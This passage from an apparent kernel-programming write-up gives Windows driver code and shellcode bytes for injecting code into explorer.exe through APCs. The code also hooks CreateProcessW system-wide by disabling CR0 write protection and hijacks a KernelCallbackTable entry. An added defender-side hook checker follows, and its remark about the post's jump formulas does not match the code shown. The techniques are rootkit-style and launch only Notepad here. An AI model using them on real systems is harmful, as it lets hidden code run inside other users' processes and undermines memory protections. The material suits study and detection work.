    // The EPROCESS/ETHREAD offsets below are hardcoded for the build the driver was tested on.
    p_proc = PsGetCurrentProcess();
    lentry = (LIST_ENTRY *)(((unsigned char *)p_proc) + 0x188); // ActiveProcessLinks : _LIST_ENTRY
    for(le = lentry; le->Flink != lentry; le = le->Flink)
    {
        p_proc = (PEPROCESS)(((unsigned char *)le) - 0x188);
        pImgFNam = (char *)(((unsigned char *)p_proc) + 0x2e0); // ImageFileName
        if(strncmp(pImgFNam, "explorer.exe", sizeof("explorer.exe")) == 0)
        {
            check = TRUE;
            break;
        }
    }
    if(!check)
    {
        return STATUS_UNSUCCESSFUL;
    }

    // CID of the target process and of the first thread in its ThreadListHead
    pid = PsGetProcessId(p_proc);
    le = (LIST_ENTRY *)(((unsigned char *)p_proc) + 0x30); // ThreadListHead
    ethreads = (PETHREAD)(((unsigned char *)(le->Flink)) - 0x2f8);
    client_id.UniqueProcess = pid;
    client_id.UniqueThread = PsGetThreadId(ethreads);

    ObjAttr.Length = sizeof(OBJECT_ATTRIBUTES);
    ObjAttr.RootDirectory = NULL;
    ObjAttr.Attributes = OBJ_KERNEL_HANDLE;
    ObjAttr.ObjectName = NULL;
    ObjAttr.SecurityDescriptor = NULL;
    ObjAttr.SecurityQualityOfService = NULL;
    status_code = ZwOpenProcess(&ProcHandle, GENERIC_ALL, &ObjAttr, &client_id);
    if(status_code != STATUS_SUCCESS)
    {
        return STATUS_UNSUCCESSFUL;
    }

    // Executable region in the target; ZeroBits is passed by value, not by address.
    status_code = ZwAllocateVirtualMemory(ProcHandle, &baseaddr, zero_bits, &region_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if(status_code != STATUS_SUCCESS)
    {
        ZwClose(ProcHandle);
        return STATUS_UNSUCCESSFUL;
    }

    // The copy has to happen inside the target's address space.
    KeStackAttachProcess(p_proc, &apc_state);
    memcpy(baseaddr, buffer, sizeof(buffer));
    KeUnstackDetachProcess(&apc_state);

    RtlInitUnicodeString(&apiName, L"KeInitializeApc");
    PKeInitializeApc = (PFN_KeInitializeApc)MmGetSystemRoutineAddress(&apiName);
    RtlInitUnicodeString(&apiName, L"KeInsertQueueApc");
    PKeInsertQueueApc = (PFN_KeInsertQueueApc)MmGetSystemRoutineAddress(&apiName);
    if(PKeInitializeApc == NULL || PKeInsertQueueApc == NULL)
    {
        ZwClose(ProcHandle);
        return STATUS_UNSUCCESSFUL;
    }

    pApc = ExAllocatePool(NonPagedPool, sizeof(struct _KAPC));
    if(pApc == NULL)
    {
        ZwClose(ProcHandle);
        return STATUS_INSUFFICIENT_RESOURCES;
    }
    // Usermode APC whose normal routine is the injected shellcode.
    PKeInitializeApc(pApc, (PKTHREAD)ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)baseaddr, UserMode, NULL);
    if(!PKeInsertQueueApc(pApc, 0, 0, 0))
    {
        // Not queued: the kernel routine will never run, so the KAPC is freed here.
        ExFreePool(pApc);
        ZwClose(ProcHandle);
        return STATUS_UNSUCCESSFUL;
    }
    ZwClose(ProcHandle);
    return STATUS_SUCCESS;
}
</code></pre>
<div style="text-align: left;">
<div style="text-align: justify;">
<br />
<span style="font-family: Verdana, sans-serif;">The driver begins by walking the <i>ActiveProcessLinks</i> list from the current EPROCESS structure in order to locate the EPROCESS corresponding to <i>Explorer.exe</i> (the target process). The code then retrieves the <i>ThreadListHead</i> from this EPROCESS, and takes note of the first ETHREAD of the list (it is not really important which one). Having done that, <i>PsGetProcessId</i> and <i>PsGetThreadId</i> are called to retrieve the CID of the target process/thread. The driver proceeds by allocating an executable area of memory inside the process via <i>ZwOpenProcess/ZwAllocateVirtualMemory</i>, where it then copies the shellcode bytes. To perform the copy, the driver needs to switch to the <i>Explorer</i> process context via <i>KeStackAttachProcess/KeUnstackDetachProcess</i>.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Finally, an APC is initialized by calling <i>KeInitializeApc</i> and passing to it the pointer to the allocated shellcode as the normal routine. This APC is then queued to the target thread belonging to <i>Explorer</i> via <i>KeInsertQueueApc</i>. To be precise, during the initialization a kernel routine is required by the OS as well, but since we don't really need it, I specified a dummy one that simply frees the memory reserved for the KAPC structure.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">At this point, whenever the target thread is scheduled for execution, the APC is going to be run and the usermode shellcode will start a new process. It goes without saying that it is important to choose a thread that is actually in an <i>alertable state</i>: some processes may have threads that are asleep or stuck in a wait, and if an APC is queued to them, it may never have a chance to be executed. In my case I picked the first thread of the <i>Explorer</i> process for convenience: I noticed that this thread awakens when you right click on the icon of a folder on the desktop, which is very handy because it allowed me to trigger the APC manually whenever I wanted.</span><br />
<br /></div>
<span style="font-family: Verdana, sans-serif;"><b><u>Method 2</u></b></span><br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an alternative, I decided to hijack the</span><span style="font-family: Verdana, sans-serif;"> execution flow of a process towards my shellcode harnessing kernelmode APCs. The idea is to patch an API that gets called quite </span><span style="font-family: Verdana, sans-serif;">often: the patch installs a jump to the shellcode </span><span style="font-family: Verdana, sans-serif;">in the entry point of the API, which</span><span style="font-family: Verdana, sans-serif;">, in turn, executes Notepad and calls the original API.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The code of the <i>DriverEntry</i> is almost the same as the one from <i>Method 1</i>; the only difference is that this time the scheduled APC is kernelmode rather than usermode. The two lines that differ are the following:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, NULL, KernelMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The first one specifies that this is a kernelmode APC, while the second one passes two parameters to the kernel routine. These parameters are the pointer to the usermode shellcode and the pointer to the EPROCESS related to <i>Explorer</i>.</span><br />
<span style="font-family: Verdana, sans-serif;">The kernelmode APC is still targeting <i>Explorer.exe</i> like before. Similarly to the shellcode, it retrieves and walks the list of LDR_DATA_TABLE_ENTRY structures </span><span style="font-family: Verdana, sans-serif;">to locate the imagebase of <i>kernel32.dll</i>. Once found, the routine retrieves the address of the <i>CreateProcessW</i> API from the export table, and proceeds by patching it in </span><span style="font-family: Verdana, sans-serif;">order to jump to the shellcode. I chose <i>CreateProcessW</i> just because it is easy to trigger it on command (e.g. by running a process from explorer's GUI), but the </span><span style="font-family: Verdana, sans-serif;">method applies equally to any other API.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The shellcode has also been slightly modified in that I added the following bytes:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> ...
0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, // last bytes of previous shellcode, padded with nops
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // myflag dq 0
0x65, 0x48, 0xa1, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax,qword ptr gs:[40h] TEB.ClientId.UniqueProcess << entry
0x3d, 0x00, 0x00, 0x00, 0x00, // cmp eax, <pid> (<pid> will be patched with the PID of explorer.exe)
0x75, 0x2d, // jnz Done
0x53, // push rbx
0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00, // mov rax, 0
0x48, 0xC7, 0xC3, 0x01, 0x00, 0x00, 0x00, // mov rbx, 1
0xF0, 0x48, 0x0F, 0xB1, 0x1D, 0xce, 0xff, 0xff, 0xff, // lock cmpxchg cs:myflag, rbx
0x5B, // pop rbx
0x75, 0x13, // jnz Done (shellcode is run only once)
// save registers used by the shellcode routine: rax, rcx, r9, r8, rdx
0x41, 0x50, // push r8
0x41, 0x51, // push r9
0x50, // push rax
0x51, // push rcx
0x52, // push rdx
0xE8, 0x5F, 0xFC, 0xFF, 0xFF, // call shellcode (beginning of shellcode)
0x5a, // pop rdx
0x59, // pop rcx
0x58, // pop rax
0x41, 0x59, // pop r9
0x41, 0x58, // pop r8
//Done:
0x48, 0x83, 0xec, 0x68, // sub rsp,68h (first two instructions of CreateProcessW)
0x48, 0x8b, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, // mov rax,qword ptr [rsp+0B8h]
0xE9, 0x00, 0x00, 0x00, 0x00 // will be patched in order to jump to the rest of the original API instructions </code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The JMP in the API entry point actually transfers execution to the third line of this block of instructions (the one marked with "entry"). This code begins by verifying that it is being run inside the Explorer process. It does so by comparing TEB.ClientId.UniqueProcess against a PID hardcoded in the CMP instruction (fourth line). The CMP instruction currently has a PID of zero (notice the four bytes following the 0x3d), but these bytes will be patched by the kernelmode APC routine with the PID of the Explorer process.<br>After this check, the code verifies that it has not already been run, by examining the line containing "myflag dq 0". These eight bytes are a quadword that initially stores 0, and which is updated to 1 the first time "lock cmpxchg cs:myflag, rbx" is executed.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If both checks are satisfied, the code saves some registers on the stack and calls the original shellcode that I described in the previous method. When the original shellcode returns, the code restores the registers saved earlier, executes the first two instructions of <i>CreateProcessW</i> and jumps to the third instruction of the original API. Again, the jump in the last line is followed by zeroed bytes, which means it currently jumps to the next instruction, but, as we will see later, these four bytes will be patched with the offset that leads the execution flow right to the third instruction of <i>CreateProcessW</i>.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I had to save two instructions because, when patching the API entry point, I write a long JMP, which takes 5 bytes. The first instruction is only 4 bytes long, so the patch also overwrites the first byte of the following instruction. For this reason, the first two instructions must be preserved and executed in order to restore the original execution flow.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that here I hardcoded the first two instructions in the shellcode, because this is a proof-of-concept. To generalize the method it is essential to use a mini-disassembler (a length disassembler) to determine how many instructions are going to be overwritten by the patch, so that they can be saved in the shellcode itself. Also note that if the very first instructions are relative jumps or calls, they cannot simply be copied: their relative offsets must be recalculated.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Finally, here is the code of the KernelRoutine:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> VOID KernelRoutine(struct _KAPC *Apc,
PKNORMAL_ROUTINE *NormalRoutine,
PVOID *NormalContext,
PVOID *SystemArgument1, // address of usermode code
PVOID *SystemArgument2 ) // pEPROCESS
{
NTSTATUS status_code;
UNICODE_STRING apiName;
unsigned __int64 peb, p_ldr, p_LDR_DATA_TABLE_ENTRY, pShellcode;
unsigned __int64 image_base, image_data_directory, export_table, AddressOfNames, AddressOfFunctions;
unsigned __int32 AddressOfNameOrdinals;
unsigned __int64 cr0;
int count = 0;
KIRQL apc_irql, old_irql;
// find CreateProcessW and patch it:
// find the peb from eprocess
peb = ((unsigned __int64 *)SystemArgument2)[0];
peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];
// find LDR in the peb
p_ldr = peb + 0x18;
p_ldr = *((unsigned __int64 *)p_ldr);
// find kernel32 in one of the LDR
p_LDR_DATA_TABLE_ENTRY = *((unsigned __int64 *)(p_ldr + 0x10));
while(wcscmp((wchar_t *)(*(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x60)), L"kernel32.dll") != 0)
{
p_LDR_DATA_TABLE_ENTRY = *(unsigned __int64 *)p_LDR_DATA_TABLE_ENTRY;
}
// get kernel32 imagebase
image_base = *(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x30);
// parse the export table to find CreateProcessW and get its address
// image_base + offset PE_HEADER + offset _IMAGE_NT_HEADERS64._IMAGE_OPTIONAL_HEADER + offset _IMAGE_OPTIONAL_HEADER.DataDirectory[0]
image_data_directory = image_base + *(unsigned __int32*)(image_base +0x3c) + 0x18 + 0x70;
export_table = *((unsigned __int32 *)image_data_directory) + image_base;
AddressOfNames = *((unsigned __int32 *)(export_table + 0x20)) + image_base;
while(strncmp((char *)(*(unsigned __int32*)AddressOfNames) + image_base, "CreateProcessW", sizeof("CreateProcessW")) != 0)
{
AddressOfNames += 4;
count++;
}
AddressOfNameOrdinals = ((unsigned __int16 *)(*((unsigned __int32 *)(export_table + 0x24)) + image_base))[count];
AddressOfFunctions = ((unsigned __int32 *)(*((unsigned __int32 *)(export_table + 0x1c)) + image_base))[AddressOfNameOrdinals] + image_base;
// (copy the first API instructions in the stub, already done)
// patch the stub of the shellcode to make the last jmp point to the third instruction of CreateProcessW (api + 0x0C)
pShellcode = *(unsigned __int64 *)SystemArgument1;
*((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-4]) = (unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x0C);
// patch the opcode that compares the current PID with the PID of the target process
*((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-0x45]) = (unsigned __int32)PsGetProcessId(*((PEPROCESS*)SystemArgument2));
_disable();
cr0 = __readcr0();
__writecr0(cr0 & 0xfffeffff);
// patch the API address to jmp to the stub, this patch will be visible to all processes
// since removing the Write-Protect flag also disables the Copy-On-Write
((char *)AddressOfFunctions)[0] = 0xe9;
*(unsigned __int32 *)(AddressOfFunctions + 1) = 0 - ((unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x56));
__writecr0(cr0);
_enable();
ExFreePool(Apc);
}
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As mentioned earlier, this routine hooks the <i>CreateProcessW</i> API by overwriting its first opcodes with a JMP to the shellcode (specifically, to the offset marked with the "entry" comment) and by patching those opcodes of the stub that depend on values available only at run time: the address of the third instruction of <i>CreateProcessW</i> and the PID of the target process.</span><br />
<span style="font-family: Verdana, sans-serif;">There is still one interesting detail that we haven't discussed yet. In order to perform the hook, the KernelRoutine clears the <i>WriteProtect</i> flag in the <i>CR0</i> register, which allows the code to write to any present memory page, even one marked read-only. However, this also has the side effect of disabling <i>copy-on-write</i>, and we will see how this is addressed.</span><br />
<span style="font-family: Verdana, sans-serif;">Normally, a physical memory page holding code from a system DLL is shared among the virtual address spaces of all processes. If a process patches such code (e.g. an API), the OS detects the write attempt and allocates a dedicated physical page to the patching process, so that the patch remains local to it and does not affect the other processes. However, with <i>WriteProtect</i> disabled, the OS does not react to the write attempt and therefore does not allocate a dedicated physical page for the patch. This means that the patch is effectively visible to all running processes, but not all of them have a shellcode to jump to. Therefore, to avoid crashing them, the shellcode needs to verify that the current PID is indeed Explorer's.</span><br />
<span style="font-family: Verdana, sans-serif;"><u><i>Note</i></u>: in cases in which the kernel routine needs to modify sensitive areas of memory, some extra care is generally required. For example, it may be necessary to disable interrupts (possibly on all CPUs, by scheduling a DPC), use atomic operations, and use proper synchronization. In my case, the driver was tested on a machine with a single CPU, therefore once interrupts are disabled with _disable(), it is pretty safe to patch the code and disable <i>WriteProtect</i> without atomic operations or synchronization.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
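<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added example (not code from this post), here is a user-mode C program that constructs a minimal PE64 image in memory, resolves an export by walking the export directory at the same offsets the KernelRoutine uses (0x3c, 0x18, 0x70 and 0x18/0x1c/0x20/0x24), and then performs the integrity check a defender would run against this kind of hook: decode the first instruction of the export and flag an E9 JMP whose rel32, computed from the end of the 5-byte instruction exactly as the routine computes it, leaves the module. It goes a little beyond the post's loop by bounds-checking every RVA and by resolving any name; the image layout, the load address and the stub address are constructed values.</span></div>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define IMG_SIZE 0x1000 /* the constructed image is one page */
/* Offsets the post's KernelRoutine walks: e_lfanew; optional header 0x18 past the PE
 * signature; DataDirectory[0] at +0x70; export directory fields at +0x18/0x1c/0x20/0x24. */
enum { OFF_LFANEW = 0x3c, OFF_OPT = 0x18, OFF_DATADIR0 = 0x70,
       EXP_NUMNAMES = 0x18, EXP_FUNCS = 0x1c, EXP_NAMES = 0x20, EXP_ORDS = 0x24 };

static uint32_t get32(const uint8_t *p, uint32_t off) { uint32_t v; memcpy(&v, p + off, 4); return v; }
static uint16_t get16(const uint8_t *p, uint32_t off) { uint16_t v; memcpy(&v, p + off, 2); return v; }
static void put32(uint8_t *p, uint32_t off, uint32_t v) { memcpy(p + off, &v, 4); }
static void put16(uint8_t *p, uint32_t off, uint16_t v) { memcpy(p + off, &v, 2); }

/* rel32 of a 5-byte E9 JMP written at 'at' and aimed at 'target': it is relative to
 * the end of the instruction, which is why the post's formulas carry a "+ 5". */
static int32_t jmp_rel32(uint64_t at, uint64_t target) { return (int32_t)(target - (at + 5)); }

/* Absolute target of an E9 JMP at 'code' (mapped at 'va'); 0 if no E9 is there. */
static uint64_t jmp_target(const uint8_t *code, uint64_t va)
{
    int32_t rel;
    if (code[0] != 0xE9) return 0;
    memcpy(&rel, code + 1, 4);
    return va + 5 + (int64_t)rel;
}

/* Resolves an export by name, bounds-checking every RVA against the image size
 * (the post's loop walks AddressOfNames until it matches). Returns 0 on failure. */
static uint32_t resolve_export(const uint8_t *img, uint32_t size, const char *name)
{
    uint32_t nt = get32(img, OFF_LFANEW), exp, nnames, funcs, names, ords, i;
    if (nt + OFF_OPT + OFF_DATADIR0 + 4 > size) return 0;
    exp = get32(img, nt + OFF_OPT + OFF_DATADIR0);
    if (exp == 0 || exp + 0x28 > size) return 0;
    nnames = get32(img, exp + EXP_NUMNAMES); funcs = get32(img, exp + EXP_FUNCS);
    names = get32(img, exp + EXP_NAMES);     ords = get32(img, exp + EXP_ORDS);
    for (i = 0; i < nnames; i++) {
        uint32_t name_rva, ord;
        if (names + 4 * i + 4 > size || ords + 2 * i + 2 > size) return 0;
        name_rva = get32(img, names + 4 * i);
        if (name_rva >= size) return 0;
        if (strncmp((const char *)img + name_rva, name, size - name_rva) != 0) continue;
        ord = get16(img, ords + 2 * i);
        if (funcs + 4 * ord + 4 > size) return 0;
        return get32(img, funcs + 4 * ord);
    }
    return 0;
}

/* Integrity check: 1 if the export begins with a JMP that leaves [base, base + size). */
static int export_hooked(const uint8_t *img, uint32_t size, uint64_t base, uint32_t rva)
{
    uint64_t t = jmp_target(img + rva, base + rva);
    return t != 0 && (t < base || t >= base + size);
}

/* Constructed PE64 image: headers, an export directory with three sorted names, the
 * first two instructions of CreateProcessW from the post at RVA 0x600, and a legitimate
 * intra-module JMP at ExitProcess (RVA 0x640) that the check must not flag. */
static void build_image(uint8_t *img)
{
    static const uint8_t prologue[] = {0x48,0x83,0xEC,0x68, 0x48,0x8B,0x84,0x24,0xB8,0x00,0x00,0x00};
    memset(img, 0, IMG_SIZE);
    memcpy(img, "MZ", 2);                 put32(img, OFF_LFANEW, 0x80);
    memcpy(img + 0x80, "PE\0\0", 4);      put32(img, 0x80 + OFF_OPT + OFF_DATADIR0, 0x200);
    put32(img, 0x200 + 0x14, 3);          put32(img, 0x200 + EXP_NUMNAMES, 3);
    put32(img, 0x200 + EXP_FUNCS, 0x300); put32(img, 0x200 + EXP_NAMES, 0x320);
    put32(img, 0x200 + EXP_ORDS, 0x340);
    strcpy((char *)img + 0x400, "CreateFileW"); strcpy((char *)img + 0x410, "CreateProcessW");
    strcpy((char *)img + 0x420, "ExitProcess");
    put32(img, 0x320, 0x400); put32(img, 0x324, 0x410); put32(img, 0x328, 0x420); /* AddressOfNames */
    put16(img, 0x340, 2);     put16(img, 0x342, 0);     put16(img, 0x344, 1);     /* NameOrdinals */
    put32(img, 0x300, 0x600); put32(img, 0x304, 0x640); put32(img, 0x308, 0x680); /* AddressOfFunctions */
    memcpy(img + 0x600, prologue, sizeof prologue);
    img[0x640] = 0xE9; put32(img, 0x641, (uint32_t)jmp_rel32(0x640, 0x680));
}

/* Runs the check end to end; returns 0 when every step behaves as expected,
 * otherwise the number of the first failing step. */
static int demo(void)
{
    uint8_t img[IMG_SIZE];
    const uint64_t base = 0x7ff800000000ULL, stub = 0x7ff7f0000100ULL; /* constructed load address and out-of-image stub */
    uint32_t rva;
    build_image(img);
    rva = resolve_export(img, IMG_SIZE, "CreateProcessW");
    if (rva != 0x600) return 1;
    if (resolve_export(img, IMG_SIZE, "NoSuchExport") != 0) return 2;
    if (export_hooked(img, IMG_SIZE, base, rva)) return 3;   /* untouched prologue */
    if (export_hooked(img, IMG_SIZE, base, 0x640)) return 4; /* intra-module JMP is fine */
    /* Reproduce the post's entry patch inside the buffer: E9 + rel32 to the stub. */
    img[rva] = 0xE9;
    put32(img, rva + 1, (uint32_t)jmp_rel32(base + rva, stub));
    if (!export_hooked(img, IMG_SIZE, base, rva)) return 5;
    if (jmp_target(img + rva, base + rva) != stub) return 6;
    return 0;
}

int main(void) { int rc = demo(); if (rc) printf("step %d failed\n", rc); else puts("all checks behaved as expected"); return rc; }
```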
<span style="font-family: Verdana, sans-serif;"><u><b>Method 3</b></u></span><br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I tried to work on a third method, which proved to be unstable and therefore cannot be used; however, I think it deserves some attention. This method tries to harness the kernelmode API <i>KeUserModeCallback</i> in order to run code in usermode.</span><br />
<span style="font-family: Verdana, sans-serif;">The OS maintains a table of usermode callback routines, which is located in usermode and is pointed to by <i>PEB.KernelCallbackTable</i>. These callbacks can be invoked from kernelmode with the API <i>KeUserModeCallback</i>, which takes as input the index of the desired function within the table. Thus, by inserting a pointer to the shellcode into this table, I can call it from kernelmode and have it executed in usermode.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code involves a few changes. A first difference is at the end of the shellcode:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> ...
0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xcd, 0x2b, 0xc3 </code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">which ends with an "int 2b" (0xcd 0x2b) and a "ret" (0xc3). We will see later why.</span></div>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another modification occurs in the <i>DriverEntry</i>, when the KAPC structure is initialized:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter">
PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)(baseaddr + 0x35A), UserMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))
</code></pre>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code again uses a dummy normal routine: in fact, the "baseaddr + 0x35a" parameter refers to the last byte of the shellcode (the RET). If a normal routine is not provided, the system seems to crash.</span></div>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Finally, the <i>KernelRoutine</i> is the one that changes significantly and does the actual job of overwriting an entry in the <i>KernelCallbackTable</i>:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> VOID KernelRoutine(struct _KAPC *Apc,
PKNORMAL_ROUTINE *NormalRoutine,
PVOID *NormalContext,
PVOID *SystemArgument1, // address of usermode code
PVOID *SystemArgument2 ) // pEPROCESS
{
NTSTATUS status_code;
UNICODE_STRING apiName;
NTSTATUS (*pKeUserModeCallback)(ULONG apiNumber, void* inputBuffer, ULONG inputLength, void** outputBuffer, ULONG* outputLength);
unsigned __int64 peb, callback_table;
unsigned __int64 cr0;
KIRQL apc_irql, old_irql;
DbgPrint("APC kernel routine\n");
RtlInitUnicodeString(&apiName, L"KeUserModeCallback");
pKeUserModeCallback = MmGetSystemRoutineAddress(&apiName);
if(pKeUserModeCallback == NULL)
{
DbgPrint("Cannot find pKeUserModeCallback\n");
return;
}
DbgPrint("Usermode address: %p \n", *SystemArgument1); // SystemArgument1 points at the slot holding the usermode address
// retrieve PEB address
peb = ((unsigned __int64 *)SystemArgument2)[0];
peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];
// retrieve kernel callback table
callback_table = ((unsigned __int64*)(((UCHAR *)peb) + 0x58))[0] ;
// insert shellcode address into an empty function slot (slot n 0x76, 0x76*8 = 3b0)
callback_table += 0x3b0;
_disable();
cr0 = __readcr0();
__writecr0(cr0 & 0xfffeffff);
((unsigned __int64*)callback_table)[0] = (unsigned __int64)((unsigned __int64 *)SystemArgument1)[0];
__writecr0(cr0);
_enable();
// call it, but first... be careful:
// usermode callbacks can only run at PASSIVE, or else bugcheck IRQL_GT_ZERO_AT_SYSTEM_SERVICE
apc_irql = KeGetCurrentIrql();
KeLowerIrql(PASSIVE_LEVEL);
status_code = pKeUserModeCallback(0x76, 0, 0, 0, 0);
KeRaiseIrql(apc_irql, &old_irql);
// ** from user mode to terminate do xor ecx, ecx / xor edx, edx / int 2b (see shellcode) **
ExFreePool(Apc);
}
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">I chose to overwrite the table entry at index 0x76 because on my system it was always zero, but it would be preferable to have a more generic approach to find an empty entry. Once the table entry is written with the pointer to the shellcode, the driver lowers the IRQL to <i>PASSIVE_LEVEL</i> (it will be restored later) and issues a call to <i>KeUserModeCallback</i> with 0x76 as index. The routine gets executed (Notepad starts successfully) and, when the usermode code has finished its task, it returns to the kernel by issuing an <i>int 2b</i>. Unfortunately, when the routine ends, it crashes. I ran some tests and experiments, trying to figure out whether it was a problem related to the stack, but I always ended up with a crash (a usermode one, not a BSOD). In the end, I did not investigate this issue further, but I believe that it should be possible to make this method stable and reliable.</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>4)</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To protect a shared memory resource (allocated in nonpaged memory) in an SMP environment I would use a spinlock: the routines responsible for accessing the resource would need to acquire the spinlock in order to read or write the data. </span><br />
<span style="font-family: Verdana, sans-serif;">Before acquiring a spinlock, the system raises the IRQL to DISPATCH_LEVEL so that other threads cannot preempt the current one on that CPU, then it attempts to obtain ownership of the spinlock by continuously checking its availability in a loop (that is, <i>spinning</i>). This mechanism ensures that only one thread on one CPU at a time accesses the shared data, and it is quite efficient, assuming that the lock is not held for long.</span><br />
<br /></div>
<span style="font-family: Verdana, sans-serif;"><b>5)</b></span><br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <Ntifs.h>
#include <string.h>
#define WORD UINT16
#define DWORD UINT32
#define BYTE UINT8
typedef struct _IMAGE_DOS_HEADER
{
WORD e_magic;
WORD e_cblp;
WORD e_cp;
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;
WORD e_sp;
WORD e_csum;
WORD e_ip;
WORD e_cs;
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
typedef struct _IMAGE_FILE_HEADER {
WORD Machine;
WORD NumberOfSections;
DWORD TimeDateStamp;
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader;
WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
typedef struct _IMAGE_DATA_DIRECTORY {
DWORD VirtualAddress;
DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
typedef struct _IMAGE_OPTIONAL_HEADER64 {
WORD Magic; /* 0x20b */
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint;
DWORD BaseOfCode;
ULONGLONG ImageBase;
DWORD SectionAlignment;
DWORD FileAlignment;
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage;
DWORD SizeOfHeaders;
DWORD CheckSum;
WORD Subsystem;
WORD DllCharacteristics;
ULONGLONG SizeOfStackReserve;
ULONGLONG SizeOfStackCommit;
ULONGLONG SizeOfHeapReserve;
ULONGLONG SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
typedef struct _IMAGE_NT_HEADERS64 {
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
VOID
(load_img)(
PUNICODE_STRING FullImageName,
HANDLE ProcessId,
PIMAGE_INFO ImageInfo
)
{
WCHAR *drivername;
UNICODE_STRING servicename;
NTSTATUS unload;
PIMAGE_DOS_HEADER MZ;
PIMAGE_NT_HEADERS64 PE;
UINT8 * entry_point;
